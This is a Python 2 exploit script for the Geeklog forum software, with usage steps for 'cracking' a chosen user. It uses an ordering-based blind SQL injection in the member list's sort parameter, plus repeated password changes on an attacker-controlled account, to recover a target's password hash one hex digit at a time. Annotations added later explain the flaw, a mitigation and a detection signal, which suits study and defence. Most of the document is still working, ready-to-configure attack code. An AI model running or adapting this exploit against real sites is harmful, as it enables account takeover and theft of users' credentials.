#!/usr/bin/python
"""
Messy geeklog exploit by jelmer

usage :
0. If you haven't got python installed download it at http://www.python.org/
1. register an account at the geeklog server you want to crack
2. change OUR_USER_ID OUR_USERNAME OUR_PASSWORD OUR_EMAIL in the source code below
   to the values assigned to the account you generated
   change GEEKLOG_LOCATION to the location of the geeklog you want to crack
   for instance http://www.geeklog.net
3. Lookup the userID of the user you want to crack and fill it in as the
   TARGET_USER_ID below
4. run this script from the commandline by typing python geeklog.py,
   *nix users can also chmod +x ./geeklog.py

Now wait (quite a long time) as it needs to crack 32 positions

notes :
theoretically it can produce false results when a user registers while
cracking is in progress
"""
# NOTE(review): what this script demonstrates, from the defender's side.
# The forum member list accepts an `order` parameter that is evidently
# interpolated unsanitised into an SQL ORDER BY clause (see the
# `order=mid(passwd,<n>,1),uid` URL built in the main loop). Sorting the
# member list by one character of the stored password hash, and comparing
# the relative position of two known rows, leaks that hash one hex digit at
# a time -- a blind, ordering-based SQL injection. No error message or data
# is ever returned directly; only row order is observed.
# Mitigation: map sort parameters to a server-side allow-list of column names
# and never splice request input into ORDER BY. Detection: requests to
# memberlist.php whose `order` value contains SQL function syntax (e.g.
# `mid(`), interleaved with repeated password changes on usersettings.php
# from the same session, are a strong signal of this probe.
# This is Python 2 code (`print` statements, the removed `md5` and `urllib2`
# modules); it does not run unmodified on Python 3.
import md5, urllib, urllib2, re

# Credentials of the account the script controls; its password is rewritten
# repeatedly so the hash of OUR_USER_ID serves as the comparison row.
OUR_USER_ID = 7000
OUR_USERNAME = "yourusername"
OUR_PASSWORD = "yourpassword"
OUR_EMAIL = "your@email.com"
# Row whose password hash is recovered.
TARGET_USER_ID = 7001
GEEKLOG_LOCATION = "http://www.geeklog.net"
# Alphabet of a hex-encoded MD5 digest (32 positions, see the main loop).
HASHCHARS = "0123456789abcdef"
# Alphabet used to generate throwaway passwords.
GEN_PASSWORD_CHARS = "abcdefghijklmnopqrstuvwxyz"

def getSessionID(username, password):
    """Log in via /users.php and return the numeric gl_session cookie value.

    Args:
        username: login name sent as the `loginname` form field.
        password: sent as the `passwd` form field.

    Returns:
        The digits captured from `gl_session=<digits>` in the Set-Cookie
        header (1 to 15 digits).

    Raises:
        KeyError: no Set-Cookie header in the response.
        AttributeError: the cookie did not match (e.g. failed login), since
            `match` is used without a None check.
        urllib2.URLError/HTTPError: transport or HTTP-level failure.
    """
    myreq = urllib2.Request(GEEKLOG_LOCATION + "/users.php")
    data = {"loginname" : username, "passwd" : password }
    # Attaching a body turns the request into a POST.
    myreq.add_data(urllib.urlencode(data))
    page = urllib2.urlopen(myreq)
    cookies = page.info()["Set-Cookie"]
    match = re.search(r"gl_session=([0-9]{1,15})", cookies)
    return match.group(1)

def changePassword(sessionID, newPassword):
    """Set the controlled account's password through /usersettings.php.

    Submits a `mode=saveuser` form for OUR_USER_ID, authenticated only by the
    gl_session cookie. Email and username are resent unchanged because the
    form saves the whole profile. Prints the new password on success; any
    HTTP failure propagates from urlopen.

    Args:
        sessionID: value returned by getSessionID().
        newPassword: plaintext password to store.
    """
    # cooktime 604800 s = 7 days; it is just the form's "remember me" field.
    data = {"passwd" : newPassword, "cooktime" : "604800", "email" : OUR_EMAIL, "uid" : str(OUR_USER_ID), "mode" : "saveuser", "username" : OUR_USERNAME }
    cookie = "gl_session=" + sessionID
    myreq = urllib2.Request(GEEKLOG_LOCATION + "/usersettings.php")
    myreq.add_data(urllib.urlencode(data))
    myreq.add_header("Cookie",cookie)
    urllib2.urlopen(myreq)
    print "changed password to " + newPassword

def hexstr(inchars):
    """Return *inchars* as lowercase hex, two digits per character.

    Equivalent to the digest object's `.hexdigest()`; the `('0' + ...)[-2:]`
    dance only left-pads values below 0x10 to two digits.
    """
    result = ''
    for char in inchars:
        result += ('0' + hex(ord(char))[2:])[-2:]
    return result

def find(input, level, max, character, position):
    """Depth-first search for a lowercase string whose MD5 hex digest has
    *character* at index *position*.

    Candidates are `input` extended by one letter per recursion level; the
    search covers strings of length `max + 1` (level counts from 0). Only
    the leaf level hashes anything.

    Args:
        input: prefix accumulated so far ('' at the top-level call).
        level: current recursion depth.
        max: deepest level; at `level == max` candidates are hashed.
        character: hex digit to match (one of HASHCHARS).
        position: index into the 32-character hex digest.

    Returns:
        (True, candidate) for the first match in GEN_PASSWORD_CHARS order,
        otherwise (False, ""). Note `input` and `max` shadow builtins.
    """
    found = False
    result = ""
    for char in GEN_PASSWORD_CHARS:
        # Once a deeper call has found a match, the remaining letters are
        # skipped and the result falls through to the return below.
        if not found:
            start = input + char
            if level < max:
                found, result = find(start, level + 1 , max, character, position)
            else:
                if hexstr(md5.new(start).digest())[position] == character:
                    return True, start
    return found, result

def generatePasswordWithHashCharAtPosition(character, position):
    """Return the shortest lowercase password whose MD5 hex digest has
    *character* at *position*, growing the length until find() succeeds.

    Never returns on failure; with 26 single-letter candidates against 16
    possible hex digits a match is normally found at length 1 or 2.
    """
    nrOfChars = 0
    while True:
        (found, value) = find ("", 0, nrOfChars, character, position)
        if found:
            return value
        else:
            nrOfChars +=1

# --- main: recover the 32 hex digits of TARGET_USER_ID's password hash ---
sessionID = getSessionID(OUR_USERNAME, OUR_PASSWORD)
print "got session ID : " + sessionID
result = ""
for i in range(32):
    print "cracked %s of 32 hash characters : %s" % ( i, result)
    page = 1
    found = False
    for j in range(len(HASHCHARS)):
        # Give our own row a hash with HASHCHARS[j] at position i, so the
        # server-side sort places it relative to the target's row.
        changePassword(sessionID, generatePasswordWithHashCharAtPosition(HASHCHARS[j], i))
        while True:
            # The injected ORDER BY: mid(passwd, i+1, 1) then uid, ascending.
            # Only the order of the two profile links is observed.
            webpage = urllib2.urlopen(GEEKLOG_LOCATION + "/forum/memberlist.php?order=mid(passwd," + str(i + 1) + ",1),uid&prevorder=uid&direction=ASC&page=" + str(page)).read()
            us = webpage.find("users.php?mode=profile&uid=" + str(OUR_USER_ID) + '"')
            target = webpage.find("users.php?mode=profile&uid=" + str(TARGET_USER_ID) + '"')
            if us != -1 and target != -1:
                # Both on this page: decided by which link appears first.
                found = us > target
                break
            elif us != -1:
                # Our row sorts before the target's (target on a later page).
                break
            elif target != -1:
                # Target's row sorts before ours.
                found = True
                break
            else:
                # Neither row on this page; move on to the next one.
                page += 1
                print "probeer pagina " + str(page)   # Dutch: "try page"
        if found:
            result += HASHCHARS[j]
            break
print "hash complete : " + result